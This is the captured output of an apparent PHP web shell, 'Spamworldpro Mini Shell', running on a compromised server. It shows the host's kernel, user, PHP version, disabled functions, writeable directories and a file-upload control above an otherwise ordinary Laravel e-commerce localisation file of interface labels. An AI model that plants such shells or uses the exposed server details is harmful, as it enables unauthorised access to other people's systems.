Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/job-board.corals.io/Corals/modules/Ecommerce/resources/lang/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/job-board.corals.io/Corals/modules/Ecommerce/resources/lang/en/labels.php
<?php

return [
    'auth' => [
        'sign_in_start_session' => 'Sign in to start your session',
        'or_using_form' => 'Or using form below',
        'no_account_register' => 'No Account? Register',
        'remember_me' => 'Remember Me',
        'login' => 'Login',
        'login_register' => 'Login / Register Account',
        'guest_checkout' => 'Continue as guest',
        'forget_password' => 'Forgot your password',
        'register_new_account' => 'Register a new account',
        'sign_in_facebook' => 'Facebook',
        'sign_in_twitter' => 'Twitter',
        'sign_in_google' => 'Google',
        'sign_in_github' => 'Github',
        'close' => 'Close',
        'country' => 'Country',
        'cell_phone' => 'Cell Phone',
        'agree' => 'I agree to the ',
        'terms' => 'terms',
        'accept_terms' => 'You have to accept our terms.',
        'terms_modal_header' => ':siteName Terms and policy',
        'register' => 'Register',
        'already_have_account' => 'Already have an account',
        'save' => '<i class="fa fa-save"></i> Save :title',
    ],
    'settings' => [
        'company' => [
            'owner' => 'Owner',
            'name' => 'Name',
            'street' => 'Street1',
            'city' => 'City',
            'state' => 'State',
            'zip' => 'Zip',
            'country' => 'Country',
            'phone' => 'Phone',
            'email' => 'Email',
        ],
        'shipping' => [
            'weight_unit' => 'Weight unit',
            'dimensions_unit' => 'Dimensions unit',
            'shippo_live_token' => 'Shippo Live Token',
            'shippo_test_token' => 'Shippo Test Token',
            'shippo_sandbox_mode' => 'Shippo Sandbox Mode',
            'select_method' => 'Please select Shipping method',
            'no_available_shipping' => 'Sorry there is no available shipping methods',
        ],
        'tax' => [
            'calculate_tax' => 'Enable Tax Calculation',

        ],
        'rating' => [
            'enable' => 'Enable Rating',
        ],
        'wishlist' => [
            'enable' => 'Enable Wishlist',
        ],
        'appearance' => [
            'page_limit' => 'Shop page limit',
            'enable_google_ecommerce_tracking' => 'Enable Enhanced eCommerce Tracking',
        ],
        'search' => [
            'title_weight' => 'Title Weight',
            'content_weight' => 'Content Weight',
            'enable_wildcards' => 'Enable Wildcard Search',
        ],
        'additonal_charge' => [
            'title' => 'Charge title to be displayed to the end user on checkout',
            'amount' => 'Charge Amount',
            'type' => 'Charge Type',
            'gateways' => 'Apply for these payment gateways only (comma seperated)',
        ],
        'checkout' => [
            'guest_checkout' => 'Enable Guest Checkout',
        ]

    ],
    'cart' => [
        'item_has_been_update' => 'Item quantity has been updated',
        'item_has_been_delete' => 'Item has been deleted from Cart',
        'cart_empty' => 'Your cart is Empty now',
        'product_has_been_add' => 'Product has been added to cart successfully',
        'product' => 'Product',
        'quantity' => 'Quantity',
        'price' => 'Price',
        'sub_total' => 'Subtotal',
        'continue_shop' => 'Continue Shopping',
        'proceed_checkout' => 'Proceed to Checkout',
        'empty_cart' => 'Empty Cart',
        'no_item_in_shopping' => 'You have no items in your shopping cart',
        'have_coupon' => 'Have a Coupon ?',
    ],
    'product' => [
        'image_upload' => 'Image has been uploaded Successfully',
        'option_cannot_global' => 'Options cannot be global and variable at same time',
        'variations' => '<i class="fa fa-fw fa-sliders"></i> Variations',
        'variations_create' => '<i class="fa fa-fw fa-plus"></i> Add New Variations',
        'category' => 'Product Categories',
        'file' => 'File',
        'description' => 'Description',
        'add_download' => 'click to add new download.',
        'variation_option' => 'Variation Options',
        'caption' => 'Caption',
        'more' => 'More &rightarrow;',
        'back_to_product' => 'Main Product :name',
    ],
    'bulkGenerate' => [
        'bulk-generate' => '<i class="fa fa-fw fa-th"></i> Generate Variations',
        'bulk-edit' => '<i class="fa fa-fw fa-pencil"></i> Edit Variations',
        'generate' => '<i class="fa fa-fw fa-th"></i> Generate',
        'variation_generate_options' => 'Generate Options',
        'variation_generate_options_label' => 'Qty, Price, Attribute values setup?',
        'variation_generate_options_list' => [
            'apply_single' => 'Apply single set to all SKUs.',
            'apply_unique' => 'Apply unique by attribute to each SKU.',
            'skip' => 'Skip and generate only.'
        ],
    ],
    'checkout' => [
        'please_enter_payment' => 'Please enter payment details',
        'title' => 'Billing Address',
        'save_billing' => 'Save billing address to my profile',
        'copy_billing' => 'Copy billing address to shipping address',
        'save_shipping' => 'Save shipping address to my profile',
        'shipping_title' => 'Shipping Address ',
        'title_checkout' => ' Checkout Details',
        'cart_detail' => 'Cart Details',
        'address_checkout' => 'Checkout Address',
        'select_shipping' => 'Select Shipping',
        'select_payment' => 'Select Payment',
        'enter_payment' => 'Enter Payment Details',
        'order_review' => 'Order Review',
        'sub_total' => 'Subtotal',
        'tax' => 'Tax',
        'discount' => 'Discount',
        'total' => 'Your Total',
        'complete_order' => '<i class="fa fa-cart"></i> Complete Order ',
    ],
    'attribute' => [
        'order' => 'Order',
        'value' => 'Value',
        'display' => 'Display',
        'add_new_option' => ' click to add new option.',
        'display_type' => 'Display type'
    ],
    'mail' => [
        'amount' => 'Amount',
        'qt' => 'QT',
        'description' => 'Description',
        'sku' => 'SKU#',
        'type' => 'Type',
        'total' => 'TOTAL',
        'download' => 'Downloadables',
        'file' => 'File',
        'premium_content' => 'Premium Content Pages',
        'bill_address' => 'Billing Address',
        'address_one' => 'Address 1',
        'address_two' => 'Address 2',
        'city' => 'City',
        'state' => 'State',
        'zip' => 'Zip',
        'country' => 'Country',
        'shipping_details' => 'Shipping Details',
        'tracking_num' => ' Tracking Number',
        'tracking_label' => 'Tracking Label',
        'click_here' => 'Click Here'
    ],
    'order' => [
        'download' => 'Downloads',
        'success' => 'Success',
        'save_send' => '<i class="fa fa-paper-plane-o"></i> Save and email client the invoice',
        'order_has_been_placed' => 'Your Order has been placed successfully',
        'go_to_my_order' => 'Go to my orders',
        'order_detail' => 'Order Details',
        'update_order' => 'Update Order',
        'update_status' => 'Update Status',
        'update_payment' => 'Update Payment',
        'update_shipping' => 'Update Shipping',
        'notify_buyer' => 'Notify Buyer',
        'refund_order' => 'Refund',
        'pay_order' => 'Pay Order',
        'my_download' => 'My Downloads',
        'my_order' => 'My Orders',
        'private_page' => 'My Private Pages',
        'title' => 'Orders',
        'billing_add' => 'Billing Address',
        'click_here' => 'Click Here',
        'shipping_details' => 'Shipping Details',
        'guest' => 'Guest',
        'tracking_num' => ' Tracking Number',
        'tracking_label' => 'Tracking Label',
        'file' => 'File',
        'description' => 'Description',
        'download_able' => 'Downloadables',
        'private_access' => 'Private Pages Access',
        'magic' => '<i class="fa fa-magic"></i> :title',
        'desc' => 'Desc',
        'date' => 'Date',
        'loc' => 'Location',
        'history' => 'History',
        'no_track' => 'there is no tracking info available, please check again later',
        'order_details' => 'Order Details',
        'invoice_details' => 'Invoice Details',
        'add_product' => 'Add Product',
        'add_fee' => 'Add Service/Fee',
        'add_shipping' => 'Add Shipping',
        'add_item_modal_title' => 'Add new item',
        'discount' => 'Discount',
        'discount_name' => 'Name',
        'discount_options' => [
            'Fixed' => 'Fixed',
            'Percentage' => 'Percentage (%)'
        ],
        'product' => 'Product',
        'fee' => 'Service/Fee',
        'shipping' => 'Shipping',
        'empty_items' => 'No Items selected',
        'subtotal' => 'Subtotal',
        'tax_total' => 'Tax Total',
        'total' => 'Total',
        'recalculate' => 'Recalculate',
        'item' => [
            'item' => 'Item',
            'type' => 'Type',
            'unit_price' => 'Unit Price',
            'quantity' => 'Quantity',
            'description' => 'Description',
            'tax' => 'Tax'
        ],
        'transactions' => [
            'title' => 'Transactions',
            'type' => 'Type',
            'amount' => 'Amount',
            'paid_amount' => 'Paid Amount',
            'reference' => 'Reference'
        ]
    ],
    'shipping' => [
        'pending' => 'Pending',
        'expired' => 'Expired',
        'place_holder' => 'All Countries',
    ],
    'shop' => [
        'title' => 'Orders',
        'my_orders' => 'My Orders',
        'my_invoices' => 'My Invoices',
        'buy' => 'Buy Product',
        'add' => 'Add to Cart',
        'out_stock' => ' Out Of Stock',
        'add_cart' => '<i class="fa fa-fw fa-cart-plus" aria-hidden="true"></i> Add to Cart',
        'no_setting_found' => 'No settings found.',
        'search' => 'Search...',
        'search_results_for' => 'Search results for: :search'

    ],
    'sku' => [
        'index_title' => '[:name] :title',
        'update_variations' => 'Update variations'
    ],
    'widget' => [
        'coupon' => 'Coupons',
        'my_download' => 'My Downloads',
        'products_by_brand' => 'Products By Brand',
        'my_order' => 'My Orders',
        'private_page' => 'My Private Pages',
        'my_wishlist' => 'My Wishlist',
        'orders' => 'Orders',
        'pending_orders' => 'Pending Orders',
        'processing_orders' => 'Processing Orders',
        'cancelled_orders' => 'Cancelled Orders',
        'product_categories' => 'Product Categories',
        'product' => 'Products',
        'revenue_order_sum' => 'Orders Revenue'
    ],

];

Spamworldpro Mini